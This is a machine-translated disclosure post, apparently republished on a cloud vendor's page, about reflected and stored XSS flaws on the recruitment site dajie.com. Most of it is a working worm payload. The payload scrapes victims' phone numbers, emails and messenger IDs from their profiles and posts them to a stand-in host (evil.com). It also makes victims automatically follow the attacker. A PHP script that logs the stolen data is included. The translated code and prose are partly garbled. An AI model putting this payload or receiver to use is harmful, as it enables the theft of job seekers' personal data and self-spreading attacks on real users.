Street network rebound and storage XSS vulnerability and test Payload

Source: Internet
Author: User

I went to the street online for an internship in the past few months. Currently, it is the most authoritative website for enterprise school recruitment. After a simple test, I have everything available for storage and rebound XSS. Http://www.dajie.com/http://www.dajie.com/card/exchange/index? KeyWords = 1234 '); alert (document. cookie );//





No filtering. In addition, there are stored XSS in your resume and business cards.

Then visit the personal homepage: through these XSS points, it is easier to collect the Resume Information of some undisclosed users. I wrote a simple XSS Payload, which can collect user contact information and send it to a remote device. The client automatically follows me and uses cookies to avoid secondary pollution. When several functions are in the same domain, the function of automatically Sending Short Messages becomes a simple worm, only sending the Payload part, and using the newer DOM method getElementsByClassName, which is initially related to XSS, hello. XSS Payload: var c_name = "uchome_loginuser" // var c_userid = "" // user IDvar cus_url = "in the cookie Field" http://www.dajie.com/profile/ Mine "// personal information interface var tel =" "// record phone var email =" "// record email var qq =" "// record QQvar msn = ""// record MSN </code> function getCookieValue (c_name) {if (document. cookie. length & gt; 0) // return the Cookie specified field {c_start = document. cookie. indexOf (c_name + "=") if (c_start! =-1) {c_start = c_start + c_name.length + 1; c_end = document. cookie. indexOf (";", c_start) if (c_end =-1) c_end = document. cookie. lengthc_userid = unescape (document. cookie. substring (c_start, c_end) return c_userid} return ""} function setCookieValue (c_name, value) // Add the Cookie value {document. cookie = c_name + "=" + escape (value)} var ajaxGet = nullfunction getUrl (url_addr) {// request GET page content (same domain) through Ajax if (window. XMLHttpRequest) {ajaxGet = new XMLHttpRequest ();} else if (window. activeXObject) {ajaxGet = new ActiveXObject ("Microsoft. XMLHTTP ");} else {return" "} ajaxGet. open ("GET", url_addr, true) ajaxGet. setRequestHeader ("Content-Type", "text/xml") ajaxGet. send (null);} var ajaxPost = nullfunction postUrl (post_url, cusKey, cusValue) // send a POST request to remote {var postStr = cusKey + "=" + cusValueif (window. XMLHttpRequest) {ajaxPost = new XMLHttpRequest ();} else if (window. activeXObject) {ajaxPost = new ActiveXObject ("Microsoft. XMLHTTP ");} else {return" "} ajaxPost. open ("POST", post_url, true) // ajax. setRequestHeader ("Content-Type", "application/x-www-form-urlencoded") ajaxPost. send (postStr)} function getPersonalInfo (responContent) // extract user personal information {var cusNode = document. createElement ("div") cusNode. innerHTML = responContentdocument. body. appendChild (cusNode) var preInfo = document. getElementsByClassName ("tl-contact-item tel") var realInfo = preInfo [0]. getElementsByTagName ("I") tel = realInfo [0]. getAttribute ("title") var preInfo = document. getElementsByClassName ("tl-contact-item qq") var realInfo = preInfo [0]. getElementsByTagName ("I") qq = realInfo [0]. getAttribute ("title") var preInfo = document. getElementsByClassName ("tl-contact-item msn") var realInfo = preInfo [0]. getElementsByTagName ("I") msn = realInfo [0]. getAttribute ("title") var preInfo = document. getElementsByClassName ("tl-contact-item email") var realInfo = preInfo [0]. getElementsByTagName ("I") email = realInfo [0]. getAttribute ("title")} c_userid = getCookieValue (c_name) // obtain the user IDvar icard_url = "from the Cookie" http://www.dajie.com/profile/ "+ C_userid +"/icard "// construct the personal business card Url function FollowMe () // automatically follow the specified user {var img = document. createElement ("img") img. src =" http://www.dajie.com/card/exchange/api/invite?cardUid=xxxxxx&ajax=1 "Document. body. appendChild (img)} if (document. cookie. indexOf ("xssed") =-1) // judge whether the content has been contaminated {var content = "" getUrl (cus_url) // obtain the content of the page ajaxGet. onreadystatechange = function () {if (ajaxGet. readyState = 4 & amp; ajaxGet. status = 200) {content = ajaxGet. responseTextgetPersonalInfo (content) var cusForm = document. createElement ("div"); document. body. appendChild (cusForm) cusForm. innerHTML = '<form id = "xssform" action =" http://www.evil.com/xsstest.php "Method =" post "name =" mbform "> '+' <input type =" text "name =" tel "value =" + escape (tel) + "/> '+' <input type =" text "name =" email "value =" + escape (email) + "/> '+' <input type =" text "name =" qq "value =" + escape (qq) + "/> '+' <input type =" text "name =" msn "value =" + escape (msn) + "/> '+' </form> 'document. getElementById ("xssform "). submit () ;}}followme ()} setCookieValue ("xssed", true) // set the Cookie to avoid multiple cross-site contamination of remote reception information. php <? Php $ ip = $ _ SERVER ['remote _ ADDR ']; $ referer = $ _ SERVER ['HTTP _ referer']; $ agent =$ _ SERVER ['HTTP _ USER_AGENT ']; $ tel =$ _ POST [tel]; $ qq =$ _ POST [qq]; $ msn = $ _ POST [msn]; $ email = $ _ POST [email]; $ time = date ("Y-m-d G: I: s "); $ file = fopen($ip.'.txt ', 'A'); fwrite ($ file, "Tel :". $ tel. "\ nQQ :". $ qq. "\ nMSN :". $ msn. "\ nEmail :". $ email); fclose ($ file); header ("Location :". $ referer); //?>
Solution: Daniel

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.